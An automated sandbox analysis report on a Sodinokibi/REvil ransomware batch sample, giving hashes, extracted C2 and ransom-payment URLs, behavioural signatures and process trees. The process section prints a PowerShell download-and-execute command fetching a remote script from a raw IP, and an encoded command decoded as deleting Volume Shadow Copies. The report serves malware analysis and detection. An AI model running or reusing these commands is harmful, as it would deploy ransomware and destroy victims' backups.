Analysis
max time kernel: 108s
max time network: 107s
platform: windows7_x64
resource: win7v200410
submitted: 19-04-2020 18:10
Static task: static1
Behavioral task: behavioral1
  Sample: ugeUxUR2.bat
  Resource: win7v200410
Behavioral task: behavioral2
  Sample: ugeUxUR2.bat
  Resource: win10v200410
General
Target: ugeUxUR2.bat
Size: 192B
MD5: b32a8a9b873bddb42382092e73e27ef6
SHA1: b539fa06c5d88d392f9740b248b692cd129f46d6
SHA256: 05633aab23dbf5e891b0ab97f4a85b00be890dd17a96ed1a7caed9ebbbd27f04
SHA512: 62730a9ccfdf743b9b49e413d57e1fdd4edfe875070d11a5e5688be94e6dad964ef7f83e25fcaa1c39ffdee783ad49dcf7e53aa5eca300175ef2e32316413dbc
Malware Config
Extracted: http://185.103.242.78/pastes/ugeUxUR2
Extracted: C:\35k679233-readme.txt
  sodinokibi
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/0880BDF2560BC8CF
  http://decryptor.cc/0880BDF2560BC8CF
Signatures
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes:
  pid 1188, process powershell.exe
Blacklisted process makes network request (1 IoC)
Processes:
  flow 3, pid 1188, process powershell.exe
Makes http(s) request (1 IoC)
Contacts server via http/https, possibly for C2 communication.
Processes:
  description: HTTP URL, flow 3, ioc: http://185.103.242.78/pastes/ugeUxUR2
Enumerates connected drives (3 TTPs)
Modifies service (2 TTPs, 4 IoCs)
Processes:
  Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer (vssvc.exe)
  Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer (vssvc.exe)
  Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer (vssvc.exe)
  Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer (vssvc.exe)
Suspicious use of WriteProcessMemory (5 IoCs)
Processes:
  PID 1120 (cmd.exe) wrote to memory of 1188 (powershell.exe)
  PID 1188 (powershell.exe) wrote to memory of 1652 (powershell.exe)
  PID 1188 (powershell.exe) wrote to memory of 1652 (powershell.exe)
  PID 1188 (powershell.exe) wrote to memory of 1652 (powershell.exe)
  PID 1188 (powershell.exe) wrote to memory of 1652 (powershell.exe)
Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes:
  Token: SeDebugPrivilege, pid 1188, powershell.exe
  Token: SeDebugPrivilege, pid 1188, powershell.exe
  Token: SeDebugPrivilege, pid 1652, powershell.exe
  Token: SeBackupPrivilege, pid 1792, vssvc.exe
  Token: SeRestorePrivilege, pid 1792, vssvc.exe
  Token: SeAuditPrivilege, pid 1792, vssvc.exe
  Token: SeTakeOwnershipPrivilege, pid 1188, powershell.exe
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes:
  pid 1188, powershell.exe
  pid 1188, powershell.exe
  pid 1188, powershell.exe
  pid 1652, powershell.exe
  pid 1652, powershell.exe
Drops file in Program Files directory (16 IoCs)
Processes:
  File created \??\c:\program files\35k679233-readme.txt (powershell.exe)
  File opened for modification \??\c:\program files\EnableSync.edrwx (powershell.exe)
  File opened for modification \??\c:\program files\SaveRepair.emz (powershell.exe)
  File opened for modification \??\c:\program files\UpdateUnpublish.xht (powershell.exe)
  File created \??\c:\program files (x86)\35k679233-readme.txt (powershell.exe)
  File opened for modification \??\c:\program files\DisableUndo.au3 (powershell.exe)
  File opened for modification \??\c:\program files\JoinClear.pptm (powershell.exe)
  File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\35k679233-readme.txt (powershell.exe)
  File opened for modification \??\c:\program files\CompleteUninstall.dotx (powershell.exe)
  File opened for modification \??\c:\program files\ConvertToRestore.ttc (powershell.exe)
  File created \??\c:\program files\microsoft sql server compact edition\35k679233-readme.txt (powershell.exe)
  File opened for modification \??\c:\program files\RegisterUnregister.mpg (powershell.exe)
  File opened for modification \??\c:\program files\LimitGrant.snd (powershell.exe)
  File opened for modification \??\c:\program files\SuspendGet.odt (powershell.exe)
  File opened for modification \??\c:\program files\SwitchUnprotect.wm (powershell.exe)
  File created \??\c:\program files\microsoft sql server compact edition\v3.5\35k679233-readme.txt (powershell.exe)
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes:
  Set value (str) \REGISTRY\USER\S-1-5-21-3765897441-2376744223-3151462503-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\lw595b79i92.bmp" (powershell.exe)
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Processes
C:\Windows\system32\cmd.exe
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\ugeUxUR2.bat"
  - Suspicious use of WriteProcessMemory
  PID: 1120
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/ugeUxUR2');Invoke-IZLSKUWOR;Start-Sleep -s 10000"
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Blacklisted process makes network request
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Drops file in Program Files directory
    - Sets desktop wallpaper using registry
    PID: 1188
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is UTF-16LE base64 and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}, which deletes Volume Shadow Copies and accounts for the vssvc.exe activity below)
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
      PID: 1652
C:\Windows\system32\vssvc.exe
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken
  PID: 1792